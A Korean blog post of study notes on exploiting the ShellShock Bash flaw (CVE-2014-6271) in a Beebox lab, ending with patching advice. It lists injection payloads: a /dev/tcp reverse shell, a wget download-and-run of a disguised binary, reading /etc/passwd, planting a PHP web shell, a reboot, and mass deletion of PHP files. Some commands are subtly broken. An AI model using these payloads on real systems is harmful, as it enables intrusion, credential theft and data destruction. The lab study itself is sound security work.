본문 바로가기

Study records/Web hacking

[Beebox] ShellShock 취약점(CVE-2014-6271)

- 2014년 9월 24일 스테판 챠젤라스(Stephane chazelas)에 의해 GNU Bash 공개

- 공격 범위 : MAC OSX, Android, OpenBSD, DHCP Client, SSH Server, CGI나 Apache를 사용하는 웹서버, 공유기 등

- 영향을 받는 버전 : GNU Bash 4.3 및 이전 버전

 

 

 

환경 변수 선언

 

 

공격 삽입 명령어
리버스 셸 연결  /bin/bash -i /dev/tcp/loclhost/8081 0>&1
악성파일 다운 wget -O /tmp/syslogd http://localhost/prog; chmod 777 /tmp/syslogd; /tmp/syslogd;
시스템 상태 체크 /bin/ping -c localhost
계정 탈취 /bin/cat /etc/passwd > dumped_file
웹 셸 생성 echo "<? \\$cmd = \\$_REQUEST[\\\"cmd\\\"]; if(\\$cmd != \\\"\\\") print shell_exec(\\$cmd;?>\" > ../../p.php
시스템 재시작 /bin/bash -c \"reboot\"
PHP 소스 삭제 find / -name *.php | xargs rm -rf

 

 

 

kali ip로 수정해야 한다

 

 

연결 후 버프스위트 수정한 값으로 Send한다.

 

 

ShellShock 취약점에서 가장 중요한 방어 방법은 패치 적용으로 시스템을 최신 상태로 유지하는 것이다. 취약한 Bash 버전을 최신 버전으로 업데이트한다.